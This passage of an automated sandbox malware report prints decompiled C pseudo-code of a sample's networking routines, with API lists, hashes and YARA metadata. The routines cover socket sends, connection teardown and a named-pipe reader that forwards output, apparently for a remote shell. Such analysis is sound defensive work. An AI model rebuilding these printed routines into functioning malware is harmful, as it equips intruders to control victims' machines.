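    c.getsockopt_fn = gso; c.send_fn = snd;
    c.pending_bytes = pending; c.queued = queued; c.idle = idle; c.open = open;
    return c;
}
```

The two details worth taking from the reconstruction: the InterlockedCompareExchange argument order (exchange before comparand) means the sample claims the send slot only when +0x3c reads 1, and the closed-socket path returns without ever writing 1 back, so a connection that hits that branch stays marked busy.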

                                                            C-Code - Quality: 97%
                                                            			E0464F610(void* __ecx) {
                                                            				void* _v8;
                                                            				long _t33;
                                                            				void* _t37;
                                                            				long _t39;
                                                            				void* _t40;
                                                            				void* _t44;
                                                            				void* _t53;
                                                            				struct _CRITICAL_SECTION* _t57;
                                                            				struct _CRITICAL_SECTION* _t59;
                                                            
                                                            				_push(__ecx);
                                                            				_t44 = __ecx;
                                                            				_v8 = 0;
                                                            				while( *((intOrPtr*)(_t44 + 0x180)) > 0) {
                                                            					_t57 = _t44 + 0x14c; // critical section guarding the list whose head is at +0x168 and tail at +0x16c
                                                            					EnterCriticalSection(_t57);
                                                            					_t53 =  *(_t44 + 0x168);
                                                            					if(_t53 ==  *(_t44 + 0x16c)) {
                                                            						if(_t53 != 0) {
                                                            							 *(_t44 + 0x168) = 0;
                                                            							 *(_t44 + 0x16c) = 0;
                                                            							goto L6;
                                                            						}
                                                            					} else {
                                                            						_t40 =  *(_t53 + 4);
                                                            						 *(_t44 + 0x168) = _t40;
                                                            						 *(_t40 + 8) = 0;
                                                            						L6:
                                                            						if(_t53 != 0) {
                                                            							 *(_t53 + 4) = 0;
                                                            							 *(_t53 + 8) = 0;
                                                            							 *((intOrPtr*)(_t44 + 0x164)) =  *((intOrPtr*)(_t44 + 0x164)) - 1; // element count: decremented on unlink, incremented again when the element is pushed back below
                                                            						}
                                                            					}
                                                            					LeaveCriticalSection(_t57);
                                                            					if(_t53 == 0) {
                                                            						break;
                                                            					} else {
                                                            						if(E0464F770(_t44, _t53,  &_v8) == 0) {
                                                            							_t33 = E0464C930(_t44 + 0x84, _t53);
                                                            							if(_t33 == 0) {
                                                            								HeapFree( *( *_t53), _t33, _t53); // heap handle is read from the element's first field; _t33 is 0 here
                                                            							}
                                                            							return 0;
                                                            						} else {
                                                            							if(_v8 != 0) {
                                                            								_t59 = _t44 + 0x14c;
                                                            								EnterCriticalSection(_t59);
                                                            								_t37 =  *(_t44 + 0x168);
                                                            								if(_t37 == 0) {
                                                            									 *(_t53 + 8) = 0;
                                                            									 *(_t53 + 4) = 0;
                                                            									 *(_t44 + 0x16c) = _t53;
                                                            								} else {
                                                            									 *(_t37 + 8) = _t53;
                                                            									 *(_t53 + 4) =  *(_t44 + 0x168);
                                                            								}
                                                            								 *((intOrPtr*)(_t44 + 0x164)) =  *((intOrPtr*)(_t44 + 0x164)) + 1;
                                                            								 *(_t44 + 0x168) = _t53;
                                                            								LeaveCriticalSection(_t59);
                                                            								break;
                                                            							} else {
                                                            								_t39 = E0464C930(_t44 + 0x84, _t53);
                                                            								if(_t39 == 0) {
                                                            									HeapFree( *( *_t53), _t39, _t53);
                                                            								}
                                                            								continue;
                                                            							}
                                                            						}
                                                            					}
                                                            					L21:
                                                            				}
                                                            				return 1;
                                                            				goto L21;
                                                            			}

                                                            0x0464f616
                                                            0x0464f61a
                                                            0x0464f61c
                                                            0x0464f630
                                                            0x0464f63d
                                                            0x0464f644
                                                            0x0464f64a
                                                            0x0464f656
                                                            0x0464f66c
                                                            0x0464f66e
                                                            0x0464f678
                                                            0x00000000
                                                            0x0464f678
                                                            0x0464f658
                                                            0x0464f658
                                                            0x0464f65b
                                                            0x0464f661
                                                            0x0464f682
                                                            0x0464f684
                                                            0x0464f686
                                                            0x0464f68d
                                                            0x0464f694
                                                            0x0464f694
                                                            0x0464f684
                                                            0x0464f69b
                                                            0x0464f6a3
                                                            0x00000000
                                                            0x0464f6a9
                                                            0x0464f6b8
                                                            0x0464f749
                                                            0x0464f750
                                                            0x0464f758
                                                            0x0464f758
                                                            0x0464f766
                                                            0x0464f6be
                                                            0x0464f6c3
                                                            0x0464f6ea
                                                            0x0464f6f1
                                                            0x0464f6f7
                                                            0x0464f6ff
                                                            0x0464f70f
                                                            0x0464f716
                                                            0x0464f71d
                                                            0x0464f701
                                                            0x0464f701
                                                            0x0464f70a
                                                            0x0464f70a
                                                            0x0464f723
                                                            0x0464f72a
                                                            0x0464f730
                                                            0x00000000
                                                            0x0464f6c5
                                                            0x0464f6cc
                                                            0x0464f6d3
                                                            0x0464f6df
                                                            0x0464f6df
                                                            0x00000000
                                                            0x0464f6d3
                                                            0x0464f6c3
                                                            0x0464f6b8
                                                            0x00000000
                                                            0x0464f6a3
                                                            0x0464f741
                                                            0x00000000

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0464F644
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0464F69B
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0464F6DF
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0464F6F1
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0464F730
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0464F758
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterFreeHeapLeave
                                                            • String ID:
                                                            • API String ID: 3296397286-0
                                                            • Opcode ID: 236dbab94d57b1353cea0e491b683116d264f0088a744fedeb944e5ad17488d6
                                                            • Instruction ID: bac2c08273f8debaae6852a13c62585a77af7c3bec03bf6a3cfe246548edcb41
                                                            • Opcode Fuzzy Hash: 236dbab94d57b1353cea0e491b683116d264f0088a744fedeb944e5ad17488d6
                                                            • Instruction Fuzzy Hash: E3314B71200200AFDB549F05E888BE6B7E8FF99314F0881B9EC0C8B255FB75A855CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E046538F0(intOrPtr* __ecx, int _a8, void* _a12) {
                                                            				intOrPtr* _v8;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				int _t26;
                                                            				void* _t39;
                                                            				int _t51;
                                                            				struct _CRITICAL_SECTION* _t56;
                                                            
                                                            				_push(__ecx);
                                                            				_t54 = __ecx;
                                                            				_t51 = _a8;
                                                            				_v8 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
                                                            					 *((intOrPtr*)(_t51 + 0x38)) = timeGetTime(); // millisecond tick count stored at +0x38 of the object passed in _a8
                                                            				}
                                                            				_t39 = _a12;
                                                            				_t26 = 0xff;
                                                            				_a8 = 0xff;
                                                            				if(_t51 != 0 &&  *((intOrPtr*)(_t51 + 0x30)) != 0) {
                                                            					_t8 = _t51 + 0x54; // 0x54
                                                            					_t56 = _t8;
                                                            					EnterCriticalSection(_t56);
                                                            					if( *((intOrPtr*)(_t51 + 0x30)) != 0) {
                                                            						SetLastError(0); // cleared so a later GetLastError reflects only the indirect call below
                                                            						_a8 =  *((intOrPtr*)( *_v8 + 0xe8))(_t51,  *((intOrPtr*)(_t39 + 0x20)),  *((intOrPtr*)(_t39 + 0x1c))); // virtual call through the vtable slot at +0xe8
                                                            					}
                                                            					LeaveCriticalSection(_t56);
                                                            					_t26 = _a8;
                                                            					_t54 = _v8;
                                                            				}
                                                            				_a8 = _t26;
                                                            				if(_t26 == 0 || _t26 == 1) {
                                                            					if(E046556C0(_t39, _t54, _t51, _t51, _t54, _t39,  &_a8) != 0) {
                                                            						_t19 = _t51 + 0x84; // 0x84
                                                            						E0464EC90(_t19);
                                                            						_t54 = _v8;
                                                            						 *(_t51 + 0x50) = 0;
                                                            						 *(_t51 + 0x84) = 0;
                                                            						E04653AC0(_t39, _v8, _t51, _v8, _t51, _t39);
                                                            					}
                                                            					_t26 = _a8;
                                                            				}
                                                            				if(_t26 == 0xff) {
                                                            					L15:
                                                            					_t26 = E0464C930(_t54 + 0xb0, _t39);
                                                            					if(_t26 == 0) {
                                                            						_t26 = HeapFree( *( *(_t39 + 0x14)), 0, _t39);
                                                            					}
                                                            					goto L17;
                                                            				} else {
                                                            					if(_t26 != 2) {
                                                            						L17:
                                                            						return _t26;
                                                            					}
                                                            					_t31 =  ==  ? 0x4c7 : GetLastError(); // 0x4c7 = ERROR_CANCELLED (1223); the decompiler did not recover the condition operands
                                                            					E04652920(_t54, _t51, 2, 4,  ==  ? 0x4c7 : GetLastError());
                                                            					goto L15;
                                                            				}
                                                            			}

                                                            0x046538f3
                                                            0x046538f6
                                                            0x046538f9
                                                            0x046538fc
                                                            0x04653903
                                                            0x0465390b
                                                            0x0465390b
                                                            0x0465390e
                                                            0x04653911
                                                            0x04653916
                                                            0x0465391b
                                                            0x04653923
                                                            0x04653923
                                                            0x04653927
                                                            0x04653931
                                                            0x04653935
                                                            0x0465394d
                                                            0x0465394d
                                                            0x04653951
                                                            0x04653957
                                                            0x0465395a
                                                            0x0465395a
                                                            0x0465395d
                                                            0x04653962
                                                            0x0465397c
                                                            0x0465397e
                                                            0x04653984
                                                            0x04653989
                                                            0x0465398f
                                                            0x04653997
                                                            0x046539a1
                                                            0x046539a1
                                                            0x046539a6
                                                            0x046539a6
                                                            0x046539ae
                                                            0x046539d2
                                                            0x046539d9
                                                            0x046539e0
                                                            0x046539ea
                                                            0x046539ea
                                                            0x00000000
                                                            0x046539b0
                                                            0x046539b3
                                                            0x046539f0
                                                            0x046539f6
                                                            0x046539f6
                                                            0x046539c2
                                                            0x046539cd
                                                            0x00000000
                                                            0x046539cd

                                                            APIs
                                                            • timeGetTime.WINMM(?,?,?,?,?,0465375E,?,00000000,?,?,?,00000000,?,04653568,?,?), ref: 04653905
                                                            • RtlEnterCriticalSection.NTDLL(00000054), ref: 04653927
                                                            • SetLastError.KERNEL32(00000000,?,0465375E,?,00000000,?,?,?,00000000,?,04653568,?,?,?,?,00000000), ref: 04653935
                                                            • RtlLeaveCriticalSection.NTDLL(00000054), ref: 04653951
                                                            • GetLastError.KERNEL32 ref: 046539B5
                                                            • HeapFree.KERNEL32(?,00000000,?,?), ref: 046539EA
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterFreeHeapLeaveTimetime
                                                            • String ID:
                                                            • API String ID: 340097737-0
                                                            • Opcode ID: 5f67767723efc0d6bf9e18cb84dce17b9e269b0fbe435ee52dcaac23034a4998
                                                            • Instruction ID: 2275efe34a72e05bc43ec78c59697814e7d3584b116709b9388f020d1348f668
                                                            • Opcode Fuzzy Hash: 5f67767723efc0d6bf9e18cb84dce17b9e269b0fbe435ee52dcaac23034a4998
                                                            • Instruction Fuzzy Hash: EF316DB1600205ABEB159F69C888BAAB7A8FF54755F108029FD09D7760FB34FD90CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 52%
                                                            			E04637AC0(void* _a4) {
                                                            				intOrPtr _v0;
                                                            				intOrPtr _v4;
                                                            				long _t33;
                                                            				struct _CRITICAL_SECTION* _t39;
                                                            				void* _t41;
                                                            				void* _t43;
                                                            
                                                            				_t16 =  ==  ? 0xc0000017 : 0xc000001d;
                                                            				RaiseException( ==  ? 0xc0000017 : 0xc000001d, 1, 0, 0);
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				_t43 = _t41;
                                                            				_push(_t43);
                                                            				if(_v0 == 0 || _v0 <= 0) {
                                                            					_t33 = 0x57;
                                                            					SetLastError(0x57);
                                                            					goto L12;
                                                            				} else {
                                                            					if( *((intOrPtr*)( *0xc0000017 + 0x40))() == 0) {
                                                            						SetLastError(0x139f);
                                                            						return 0xbadbad;
                                                            					} else {
                                                            						_t39 = 0xffffffffc0000163;
                                                            						EnterCriticalSection(0xffffffffc0000163);
                                                            						if( *((intOrPtr*)( *0xc0000017 + 0x40))() == 0) {
                                                            							_t33 = 0x139f;
                                                            						} else {
                                                            							_t33 = E0464FAD0(0xc0000017, _v4, _v0);
                                                            						}
                                                            						LeaveCriticalSection(_t39);
                                                            						if(_t33 == 0) {
                                                            							L12:
                                                            							return 0 | _t33 == 0x00000000;
                                                            						} else {
                                                            							SetLastError(_t33);
                                                            							return 0 | _t33 == 0x00000000;
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            Instruction addresses
                                                            0x04637ada 0x04637ade 0x04637ae4 0x04637ae5 0x04637ae6 0x04637ae7 0x04637ae8 0x04637ae9 0x04637aea 0x04637aeb
                                                            0x04637aec 0x04637aed 0x04637aee 0x04637aef 0x04637af3 0x0464fa30 0x0464fa3a 0x0464fab1 0x0464fab7 0x00000000
                                                            0x0464fa42 0x0464fa49 0x0464fa9f 0x0464faae 0x0464fa4b 0x0464fa4c 0x0464fa53 0x0464fa62 0x0464fa75 0x0464fa64
                                                            0x0464fa71 0x0464fa71 0x0464fa7b 0x0464fa84 0x0464fabd 0x0464fac6 0x0464fa86 0x0464fa87 0x0464fa96 0x0464fa96
                                                            0x0464fa84 0x0464fa49

                                                            APIs
                                                            • RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 04637ADE
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0464FA53
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0464FA7B
                                                            • SetLastError.KERNEL32(0000139F,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464FA87
                                                              • Part of subcall function 0464FAD0: SetEvent.KERNEL32(?,?,?,?,?,0464FA71,00000000,00000000,?,?,046383DB,80004005,?,046387F8,04638B6E,00000000), ref: 0464FB2C
                                                            • SetLastError.KERNEL32(0000139F,?,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464FA9F
                                                            • SetLastError.KERNEL32(00000057,74D0F5E0,?,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464FAB7
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CriticalSection$EnterEventExceptionLeaveRaise
                                                            • String ID:
                                                            • API String ID: 3848672818-0
                                                            • Opcode ID: 1369604a91b96b111b7b61ff40885e36aaf1aeff8cf35c582970b9f7ef6107a9
                                                            • Instruction ID: 9b7a2d512b9149d63d7d152cc2c709378fc6f973beee7cb8133ee64652e34b23
                                                            • Opcode Fuzzy Hash: 1369604a91b96b111b7b61ff40885e36aaf1aeff8cf35c582970b9f7ef6107a9
                                                            • Instruction Fuzzy Hash: E7119A36300209EBDB085665D80CBBA7B6DDFD4761F05C029F909DB294EF79D89197A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E04653800(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a8, void* _a12) {
                                                            				signed int _v8;
                                                            				long _v12;
                                                            				intOrPtr* _v16;
                                                            				void* _v20;
                                                            				signed int _t22;
                                                            				void* _t26;
                                                            				long _t28;
                                                            				intOrPtr _t35;
                                                            				void* _t47;
                                                            				struct _CRITICAL_SECTION* _t50;
                                                            				signed int _t52;
                                                            
                                                            				_t22 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t22 ^ _t52;
                                                            				_t35 = _a8;
                                                            				_t47 = _a12;
                                                            				_v16 = __ecx;
                                                            				_v20 = _t47;
                                                            				_v12 = 0;
                                                            				__imp__#21( *((intOrPtr*)(_t35 + 0x88)), 0xffff, 0x7010,  &_v12, 4);
                                                            				_t9 = _t35 + 0x54; // 0x54
                                                            				_t50 = _t9;
                                                            				 *((intOrPtr*)(_t35 + 0x48)) = 1;
                                                            				EnterCriticalSection(_t50);
                                                            				if( *((intOrPtr*)(_t35 + 0x30)) != 0) {
                                                            					SetLastError(0);
                                                            					_t26 =  *((intOrPtr*)( *_v16 + 0xdc))(_t35);
                                                            					_t48 = _t26;
                                                            					LeaveCriticalSection(_t50);
                                                            					if(_t26 == 2) {
                                                            						_t47 = _v20;
                                                            						goto L5;
                                                            					} else {
                                                            						E04653AC0(_t35, _v16, _t48, _t50, _t35, _v20);
                                                            						return E04655AFE(_v8 ^ _t52);
                                                            					}
                                                            				} else {
                                                            					LeaveCriticalSection(_t50);
                                                            					L5:
                                                            					E04652920(_v16, _t35, 0, 0, 0);
                                                            					_t28 = E0464C930(_v16 + 0xb0, _t47);
                                                            					if(_t28 == 0) {
                                                            						HeapFree( *( *(_t47 + 0x14)), _t28, _t47);
                                                            					}
                                                            					return E04655AFE(_v8 ^ _t52);
                                                            				}
                                                            			}

                                                            Instruction addresses
                                                            0x04653806 0x0465380d 0x04653811 0x04653819 0x0465382f 0x04653832 0x04653835 0x0465383c 0x04653842 0x04653842
                                                            0x04653845 0x0465384d 0x04653857 0x04653864 0x04653870 0x04653877 0x04653879 0x04653882 0x046538a3 0x00000000
                                                            0x04653884 0x0465388b 0x046538a0 0x046538a0 0x04653859 0x0465385a 0x046538a6 0x046538b2 0x046538be 0x046538c5
                                                            0x046538ce 0x046538ce 0x046538e4 0x046538e4

                                                            APIs
                                                            • setsockopt.WS2_32(?,0000FFFF,00007010,?,00000004), ref: 0465383C
                                                            • RtlEnterCriticalSection.NTDLL(00000054), ref: 0465384D
                                                            • RtlLeaveCriticalSection.NTDLL(00000054), ref: 0465385A
                                                              • Part of subcall function 04652920: RtlEnterCriticalSection.NTDLL(00000054), ref: 04652959
                                                              • Part of subcall function 04652920: RtlEnterCriticalSection.NTDLL(-0000006C), ref: 0465295F
                                                            • SetLastError.KERNEL32(00000000), ref: 04653864
                                                            • RtlLeaveCriticalSection.NTDLL(00000054), ref: 04653879
                                                            • HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 046538CE
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$Enter$Leave$ErrorFreeHeapLastsetsockopt
                                                            • String ID:
                                                            • API String ID: 773220702-0
                                                            • Opcode ID: de9e89f20ecde79aff828e8dbcceb534a22244fff6ac88834465794f7fb5fab5
                                                            • Instruction ID: df544d239f3633b470f81a849bed7d1e841570ed0f28a2f081d84d7321b6da52
                                                            • Opcode Fuzzy Hash: de9e89f20ecde79aff828e8dbcceb534a22244fff6ac88834465794f7fb5fab5
                                                            • Instruction Fuzzy Hash: F9217F75A00209EBDB149F99DC88FAEB7B9FF58710F004069ED06A7391EB746944CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 80%
                                                            			E04644000(intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				void _v1036;
                                                            				void _v1037;
                                                            				void* _v1040;
                                                            				intOrPtr _v1044;
                                                            				intOrPtr _v1056;
                                                            				char _v1060;
                                                            				intOrPtr _v1061;
                                                            				long _v1064;
                                                            				long _v1065;
                                                            				long _v1068;
                                                            				long _v1069;
                                                            				signed int _t26;
                                                            				void* _t48;
                                                            				void* _t55;
                                                            				intOrPtr _t57;
                                                            				signed int _t58;
                                                            
                                                            				_t26 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t26 ^ (_t58 & 0xfffffff8) - 0x0000042c;
                                                            				_t48 = PeekNamedPipe;
                                                            				_t57 = _a4;
                                                            				_v1068 = 0;
                                                            				while(1) {
                                                            					L1:
                                                            					Sleep(0x64);
                                                            					if(PeekNamedPipe( *(_t57 + 0xc),  &_v1036, 0x400,  &_v1068,  &_v1064, 0) == 0) {
                                                            						continue;
                                                            					}
                                                            					L2:
                                                            					while(_v1068 > 0) {
                                                            						_t55 = LocalAlloc(0x40, _v1064);
                                                            						ReadFile( *(_t57 + 0xc), _t55, _v1064,  &_v1068, 0);
                                                            						_t53 = _t55;
                                                            						E04646470(_t48,  &_v1060, _t55, _t55, _t57, _v1068);
                                                            						_t51 =  >=  ? _v1060 :  &_v1060;
                                                            						_push(0x3f);
                                                            						_push(_v1044 + _v1044);
                                                            						_push( >=  ? _v1060 :  &_v1060);
                                                            						E04631C60( *((intOrPtr*)(_t57 + 4)));
                                                            						LocalFree(_t55);
                                                            						_t40 = _v1056;
                                                            						if(_v1056 >= 8) {
                                                            							E04633540(_t48, _t53, _t55, _v1061, _t40 + 1);
                                                            						}
                                                            						if(PeekNamedPipe( *(_t57 + 0xc),  &_v1037, 0x400,  &_v1069,  &_v1065, 0) != 0) {
                                                            							continue;
                                                            						} else {
                                                            							while(1) {
                                                            								L1:
                                                            								Sleep(0x64);
                                                            								if(PeekNamedPipe( *(_t57 + 0xc),  &_v1036, 0x400,  &_v1068,  &_v1064, 0) == 0) {
                                                            									continue;
                                                            								}
                                                            								goto L2;
                                                            								do {
                                                            									goto L1;
                                                            								} while (PeekNamedPipe( *(_t57 + 0xc),  &_v1036, 0x400,  &_v1068,  &_v1064, 0) == 0);
                                                            								goto L2;
                                                            							}
                                                            						}
                                                            					}
                                                            					L1:
                                                            					Sleep(0x64);
                                                            				}
                                                            			}

                                                            Instruction addresses
                                                            0x0464400c 0x04644013 0x0464401b 0x04644022 0x04644026 0x04644030 0x04644030 0x04644032 0x04644055 0x00000000
                                                            0x00000000 0x00000000 0x04644057 0x0464406c 0x0464407b 0x04644085 0x0464408b 0x0464409d 0x046440a4 0x046440a6
                                                            0x046440a7 0x046440ab 0x046440b1 0x046440b7 0x046440be 0x046440c6 0x046440c6 0x046440e8 0x00000000 0x046440ee
                                                            0x04644030 0x04644030 0x04644032 0x04644055 0x00000000 0x00000000 0x00000000 0x04644030 0x00000000 0x00000000
                                                            0x00000000 0x04644030 0x04644030 0x046440e8 0x04644030 0x04644032 0x04644053

                                                            APIs
                                                            • Sleep.KERNEL32(00000064), ref: 04644032
                                                            • PeekNamedPipe.KERNEL32(?,?,00000400,?,?,00000000), ref: 04644051
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 04644064
                                                            • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0464407B
                                                            • LocalFree.KERNEL32(00000000,?,?,0000003F,?,?,?,?,?,?,?,00000000), ref: 046440B1
                                                            • PeekNamedPipe.KERNEL32(?,?,00000400,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 046440E4
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LocalNamedPeekPipe$AllocFileFreeReadSleep
                                                            • String ID:
                                                            • API String ID: 2866027955-0
                                                            • Opcode ID: b890d2a5d9b55653edc2485c542ee896a00301d404a23d6e96d93647f5173239
                                                            • Instruction ID: e279ba1885b240d6775f5828f372e0299dfcc0d6e68a194762f877b0d7bcfa2d
                                                            • Opcode Fuzzy Hash: b890d2a5d9b55653edc2485c542ee896a00301d404a23d6e96d93647f5173239
                                                            • Instruction Fuzzy Hash: 52212572114301AFE714DF54DC85FABB7E8EB88700F00491DFA95C2190EB34E919CB66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WSAEventSelect.WS2_32(?,?,00000023), ref: 0464E2E8
                                                            • WSAGetLastError.WS2_32(?,0464E1F3,00000010), ref: 0464E2F3
                                                            • SetLastError.KERNEL32(00000000,?,0464E1F3,00000010), ref: 0464E328
                                                            • send.WS2_32(?,00000000,00000000,00000000), ref: 0464E343
                                                            • WSAGetLastError.WS2_32(?,0464E1F3,00000010), ref: 0464E34E
                                                            • GetLastError.KERNEL32(?,0464E1F3,00000010), ref: 0464E369
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$EventSelectsend
                                                            • String ID:
                                                            • API String ID: 259408233-0
                                                            • Opcode ID: 1ef2dd1c79c9ef8f050df56a44149fefd32dc2ad3740406c8d7fde521d466280
                                                            • Instruction ID: 9c5c4791b8bc9771c70cfc8416b9d552e71e007fd6b8988df42dfe572dfe814c
                                                            • Opcode Fuzzy Hash: 1ef2dd1c79c9ef8f050df56a44149fefd32dc2ad3740406c8d7fde521d466280
                                                            • Instruction Fuzzy Hash: 3B2172712007009FE7359FA4E84CB46BBF5FB54315F104A1DE65AC66D0E7BAE8049F94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 18%
                                                            			E0464E6F0(intOrPtr* __ecx) {
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				intOrPtr _t29;
                                                            				intOrPtr _t30;
                                                            				long _t36;
                                                            				intOrPtr* _t45;
                                                            
                                                            				_t45 = __ecx;
                                                            				_t36 = GetCurrentThreadId();
                                                            				if( *((intOrPtr*)(_t45 + 0x50)) == 3) {
                                                            					L14:
                                                            					 *((intOrPtr*)(_t45 + 0x48)) = 1;
                                                            					SetLastError(0x139f);
                                                            					return 0;
                                                            				} else {
                                                            					E0464EC90(_t45 + 0x148);
                                                            					if( *((intOrPtr*)( *_t45 + 0x24))() == 0) {
                                                            						 *((intOrPtr*)(_t45 + 0x148)) = 0;
                                                            						goto L14;
                                                            					} else {
                                                            						 *((intOrPtr*)(_t45 + 0x50)) = 2;
                                                            						_push(_t36);
                                                            						 *((intOrPtr*)(_t45 + 0x148)) = 0;
                                                            						E0464E8C0(_t36, _t45, _t45);
                                                            						if( *((intOrPtr*)( *_t45 + 0x40))() != 0) {
                                                            							if( *((intOrPtr*)(_t45 + 0x18)) != 0) {
                                                            								__imp__#19( *((intOrPtr*)(_t45 + 0x1c)), 0x467f78c, 0x10, 0);
                                                            							}
                                                            							 *((intOrPtr*)(_t45 + 0x4c)) = 0;
                                                            						}
                                                            						if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                                            							 *((intOrPtr*)( *_t45 + 0x90))( *((intOrPtr*)(_t45 + 0x10)),  *((intOrPtr*)(_t45 + 0x14)));
                                                            						}
                                                            						_t29 =  *((intOrPtr*)(_t45 + 0x20));
                                                            						if(_t29 != 0) {
                                                            							__imp__WSACloseEvent(_t29);
                                                            							 *((intOrPtr*)(_t45 + 0x20)) = 0;
                                                            						}
                                                            						_t30 =  *((intOrPtr*)(_t45 + 0x1c));
                                                            						if(_t30 != 0xffffffff) {
                                                            							__imp__#22(_t30, 1);
                                                            							__imp__#3( *((intOrPtr*)(_t45 + 0x1c)));
                                                            							 *((intOrPtr*)(_t45 + 0x1c)) = 0xffffffff;
                                                            						}
                                                            						 *((intOrPtr*)( *_t45 + 0xb8))();
                                                            						return 1;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464E6F5
                                                            • SetLastError.KERNEL32(0000139F,?,00000000,04638425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464E7D9
                                                              • Part of subcall function 0464EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0464ECA5
                                                              • Part of subcall function 0464EC90: SwitchToThread.KERNEL32(?,?,00000000,0464E712,?,00000000,04638425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,046387F8), ref: 0464ECBD
                                                              • Part of subcall function 0464E8C0: SetEvent.KERNEL32(?,?,04638B6E,0467E024,?), ref: 0464E8E7
                                                              • Part of subcall function 0464E8C0: CloseHandle.KERNEL32(00000000,?,04638B6E,0467E024,?), ref: 0464E90A
                                                            • send.WS2_32(?,0467F78C,00000010,00000000), ref: 0464E757
                                                            • WSACloseEvent.WS2_32(00000000), ref: 0464E782
                                                            • shutdown.WS2_32(?,00000001), ref: 0464E79A
                                                            • closesocket.WS2_32(?), ref: 0464E7A3
                                                            Memory Dump Source
